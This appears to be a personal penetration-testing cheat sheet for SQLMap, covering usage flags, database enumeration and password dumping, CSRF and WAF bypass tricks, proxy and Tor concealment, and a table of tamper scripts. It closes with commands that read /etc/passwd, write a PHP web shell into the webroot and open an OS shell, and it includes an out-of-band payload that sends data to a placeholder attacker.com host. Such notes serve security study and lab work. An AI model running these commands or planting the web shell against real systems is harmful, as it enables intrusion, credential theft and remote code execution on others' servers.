SQLMap

SQLMap can use JSON and XML in req bodies as well

Target connection
Injection detection
Fingerprinting

Enumeration

Optimization

Protection detection and bypass using "tamper" scripts

Database content retrieval

File system access

Execution of the operating system (OS) commands

Installation

$ sudo apt install sqlmap
$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
$ python sqlmap.py # if via git clone above

Injection Types

  • B: Boolean-based blind

  • E: Error-based

  • U: Union query-based

  • S: Stacked queries

  • T: Time-based blind

  • Q: Inline queries

  • Out of bands (not sure the syntax)

    LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))

Basic Usage

$ sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

--batch is to skip any required user input

Post Method

$ sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

Using Full request

$ sqlmap -r req.txt

Custom requests

$ sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'
$ sqlmap ... -H='Cookie:PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

--referer , --host , -A/--user-agent , --method

--random-agent to randomize UA

--mobile to imitate mobile

Sample Usage

$ sqlmap -r case4.txt -dbms mysql --technique u --hex -T flag4 --dump

Attack Tuning

Prefix and Suffix

$ sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Level and Risk

$ sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

--risk is the risk of the payload to cause problem or DoS

--level increases the bounds (lower expectancy, higher level)

--level=1 --risk=1 is 72 payloads while --level=5 --risk=3 is 7865

Status Code

--code=200 for true responses

Titles

--titles=<title>

Strings

--string=success

Text-only

--text-only for visible content only

Technique

--technique=BEU (boolean, error, union)

Union Based

--union-cols=17

--union-char='a' this will use union select 'a','a','a'

--union-from=users if there is an appendix requirement like in oracle

Database Enumeration

--banner is version

--current-user is user

--current-db is database()

--is-dba is admin rights

--dump-format html/csv

-C username,password for retrieving specific columns

--start=2 --stop=3 for retrieving rows 2-3

--where="name LIKE 'f%'" for conditional enumeration

--dump to dump the current specified table (or dump whole db if no -T)

--dump-all to dump all the content from all dbs

--schema for complete overview of db structure

--search -T user search for table that matches "user"

--search -C pass search for columns that matches "pass"

--passwords to dump passwords from other db?? like in mysql.users

--all --batch will do everything automatically

Bypassing Web Application Protections

Anti CSRF Token Bypass

$ sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

$ sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5

Calculated Parameter Bypass

$ sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5

IP Address Concealing

--proxy="socks4://177.39.187.70:33283"

--proxy-file

--tor

--check-tor to check if tor properly setup

WAF Bypass

--skip-waf to skip WAF heuristic checks

User-Agent Blacklisting Bypass

--random-agent

Tamper Scripts

Tamper-Script

Description

0eunion

Replaces instances of UNION with e0UNION

base64encode

Base64-encodes all characters in a given payload

between

Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #

commalesslimit

Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart

equaltolike

Replaces all occurrences of operator equal (=) with LIKE counterpart

halfversionedmorekeywords

Adds (MySQL) versioned comment before each keyword

modsecurityversioned

Embraces complete query with (MySQL) versioned comment

modsecurityzeroversioned

Embraces complete query with (MySQL) zero-versioned comment

percentage

Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)

plus2concat

Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart

randomcase

Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)

space2comment

Replaces space character ( ) with comments `/

space2dash

Replaces space character ( ) with a dash comment (--) followed by a random string and a new line ()

space2hash

Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line ()

space2mssqlblank

Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters

space2plus

Replaces space character ( ) with plus (+)

space2randomblank

Replaces space character ( ) with a random blank character from a valid set of alternate characters

symboliclogical

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

versionedkeywords

Encloses each non-function keyword with (MySQL) versioned comment

versionedmorekeywords

Encloses each keyword with (MySQL) versioned comment

Miscellaneous Bypass

--chunked to split post request's body

Reading Files and RCE

$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
$ sqlmap -u "http://www.example.com/?id=1" --os-shell #mssql madalas

Note in --os-shell, try different --techniques if applicable

PreviousFFUFNextResponder

Last updated